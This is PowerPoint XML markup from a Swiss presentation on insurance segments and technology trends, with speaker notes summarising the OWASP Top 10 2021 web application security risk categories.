    <dgm:cxn modelId="{385613F7-2653-4177-A761-8476D337F5F1}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{A2905200-6A8F-4452-B531-A688E4AC5AA8}" srcOrd="17" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{97F29BA3-73D3-49E2-9613-3398685709B0}" type="presParOf" srcId="{75CD8DD2-B05D-4C75-94FA-FA6B48D3A009}" destId="{A3B3CD3B-6DD8-4694-8035-F229DDC91066}"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FC921-8388-407C-B17E-FA10E3790AB3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="700857" y="1275"/>
          <a:ext cx="1870060" cy="1288471"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId1" cstate="email">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l="17274" t="2502" r="17274" b="250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E56542-1077-42B0-A593-F6CCD9FB7B7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="700857" y="1289747"/>
          <a:ext cx="1870060" cy="693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marL="0" lvl="0" indent="0" algn="ctr" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t>Health </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="700857" y="1289747"/>
        <a:ext cx="1870060" cy="693792"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2130F77D-5F09-4A10-BE88-C749AD5EF43A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2758002" y="1275"/>
          <a:ext cx="1870060" cy="1288471"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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7274" t="2502" r="17274" b="250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E5A85C-4A24-4BC6-8632-6CC0750CD8B3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2758002" y="1289747"/>
          <a:ext cx="1870060" cy="693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marL="0" lvl="0" indent="0" algn="ctr" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>Accident</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t> and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>daily</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>allowance</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2758002" y="1289747"/>
        <a:ext cx="1870060" cy="693792"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{379620AC-81E9-4219-B808-D4C24DFCB96E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="700857" y="2170546"/>
          <a:ext cx="1870060" cy="1288471"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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l="17274" t="2502" r="17274" b="250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737B8F-DC12-4F7A-92AB-B3ABFCA4DC99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="700857" y="3459017"/>
          <a:ext cx="1870060" cy="693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marL="0" lvl="0" indent="0" algn="ctr" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t>Life </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>insurers</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="700857" y="3459017"/>
        <a:ext cx="1870060" cy="693792"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B8DD0E30-AE46-40A5-9F59-B448917AD061}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2758002" y="2170546"/>
          <a:ext cx="1870060" cy="1288471"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst/>
        </a:prstGeom>
        <a:blipFill dpi="0" rotWithShape="1">
          <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"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l="17274" t="2502" r="17274" b="250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3C7661-DDA7-41D8-888F-0998E8A33F7E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2758002" y="3459017"/>
          <a:ext cx="1870060" cy="693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marL="0" lvl="0" indent="0" algn="ctr" defTabSz="666750">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t>Claims and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>absence</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="1500" kern="1200" dirty="0" err="1"/>
            <a:t>reporting</a:t>
          </a:r>
          <a:endParaRPr lang="de-CH" sz="1500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2758002" y="3459017"/>
        <a:ext cx="1870060" cy="6937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CC34C-8DA1-44EA-86B6-C6F8D70D19EA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3965" y="713191"/>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dirty="0"/>
            <a:t>Developer </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="2500" kern="1200" dirty="0" err="1"/>
            <a:t>flow</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3965" y="713191"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D0EA8E9F-8B98-4306-8F3F-42E07B5D4F10}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2365941" y="713191"/>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dirty="0"/>
            <a:t>Cloud </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="2500" kern="1200" dirty="0" err="1"/>
            <a:t>ubiquity</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2365941" y="713191"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{27F28314-A3FD-4ECF-835F-F9A2C49E8011}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4727916" y="713191"/>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a:t>App ubiquity</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4727916" y="713191"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{412E78AC-0D05-4E77-A92F-D63C08BC9E2A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7089892" y="713191"/>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dirty="0"/>
            <a:t>Cloud-native</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7089892" y="713191"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C5496DAD-EA5A-4592-AE23-B5AB9247B13B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9451867" y="713191"/>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a:t>Unified data</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9451867" y="713191"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3FF7B008-699E-4921-9EC8-3BFBC6495CDC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3965" y="2216266"/>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a:t>Models as platforms</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3965" y="2216266"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{74D88E0B-25CB-4581-B399-221EE7F07D5E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2365941" y="2216266"/>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a:t>Hybrid AI</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2365941" y="2216266"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9FD1CBDF-7E6E-414E-B347-619EE2F7F926}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4727916" y="2216266"/>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dirty="0"/>
            <a:t>Low-code / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="2500" kern="1200" dirty="0" err="1"/>
            <a:t>no</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="de-CH" sz="2500" kern="1200" dirty="0"/>
            <a:t>-code</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4727916" y="2216266"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{186D59CA-82B1-444C-A561-CEE8BED00739}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7089892" y="2216266"/>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a:t>Collaborative apps</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7089892" y="2216266"/>
        <a:ext cx="2147250" cy="1288350"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A3B3CD3B-6DD8-4694-8035-F229DDC91066}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="9451867" y="2216266"/>
          <a:ext cx="2147250" cy="1288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e-CH" sz="2500" kern="1200"/>
            <a:t>Metaverse</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="9451867" y="2216266"/>
        <a:ext cx="2147250" cy="1288350"/>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E43A3-0E69-4028-B5CB-BD1961E9F3EB}" type="datetimeFigureOut">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>16.12.2022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10381-90C7-435A-898E-9A861C0BEAF3}" type="slidenum">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>‹Nr.›</a:t>
            </a:fld>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3284305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owasp.org/Top10/A06_2021-Vulnerable_and_Outdated_Components/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A01_2021-Broken_Access_Control/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A05_2021-Security_Misconfiguration/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29/"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owasp.org/Top10/A04_2021-Insecure_Design/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A09_2021-Security_Logging_and_Monitoring_Failures/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A03_2021-Injection/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A02_2021-Cryptographic_Failures/" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failure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CB810381-90C7-435A-898E-9A861C0BEAF3}" type="slidenum">
              <a:rPr lang="de-CH" smtClean="0"/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="de-CH"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="133439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1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>A01:2021-Broken Access Control</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> moves up from the fifth position to the category with the most serious web application security risk; the contributed data indicates that on average, 3.81% of applications tested had one or more Common Weakness Enumerations (CWEs) with more than 318k occurrences of CWEs in this risk category. The 34 CWEs mapped to Broken Access Control had more occurrences in applications than any other category.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>A02:2021-Cryptographic Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> shifts up one position to #2, previously known as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A3:2017-Sensitive Data Exposure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, which was broad symptom rather than a root cause. The renewed name focuses on failures related to cryptography as it has been implicitly before. This category often leads to sensitive data exposure or system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>A03:2021-Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> slides down to the third position. 94% of the applications were tested for some form of injection with a max incidence rate of 19%, an average incidence rate of 3.37%, and the 33 CWEs mapped into this category have the second most occurrences in applications with 274k occurrences. Cross-site Scripting is now part of this category in this edition.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>A04:2021-Insecure Design</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> is a new category for 2021, with a focus on risks related to design flaws. If we genuinely want to "move left" as an industry, we need more threat modeling, secure design patterns and principles, and reference architectures. An insecure design cannot be fixed by a perfect implementation as by definition, needed security controls were never created to defend against specific attacks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>A05:2021-Security Misconfiguration</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> moves up from #6 in the previous edition; 90% of applications were tested for some form of misconfiguration, with an average incidence rate of 4.5%, and over 208k occurrences of CWEs mapped to this risk category. With more shifts into highly configurable software, it's not surprising to see this category move up. The former category for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A4:2017-XML External Entities (XXE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> is now part of this risk category.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>A06:2021-Vulnerable and Outdated Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> was previously titled Using Components with Known Vulnerabilities and is #2 in the Top 10 community survey, but also had enough data to make the Top 10 via data analysis. This category moves up from #9 in 2017 and is a known issue that we struggle to test and assess risk. It is the only category not to have any Common Vulnerability and Exposures (CVEs) mapped to the included CWEs, so a default exploit and impact weights of 5.0 are factored into their scores.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>A07:2021-Identification and Authentication Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> was previously Broken Authentication and is sliding down from the second position, and now includes CWEs that are more related to identification failures. This category is still an integral part of the Top 10, but the increased availability of standardized frameworks seems to be helping.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>A08:2021-Software and Data Integrity Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> is a new category for 2021, focusing on making assumptions related to software updates, critical data, and CI/CD pipelines without verifying integrity. One of the highest weighted impacts from Common Vulnerability and Exposures/Common Vulnerability Scoring System (CVE/CVSS) data mapped to the 10 CWEs in this category. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A8:2017-Insecure Deserialization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> is now a part of this larger category.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>A09:2021-Security Logging and Monitoring Failures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> was previously </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>A10:2017-Insufficient Logging &amp; Monitoring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> and is added from the Top 10 community survey (#3), moving up from #10 previously. This category is expanded to include more types of failures, is challenging to test for, and isn't well represented in the CVE/CVSS data. However, failures in this category can directly impact visibility, incident alerting, and forensics.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>A10:2021-Server-Side Request Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> is added from the Top 10 community survey (#1). The data shows a relatively low incidence rate with above average testing coverage, along with above-average ratings for Exploit and Impact potential. This category represents the scenario where the security community members are telling us this is important, even though it's not illustrated in the data at this time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Foliennummernplatzhalter 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
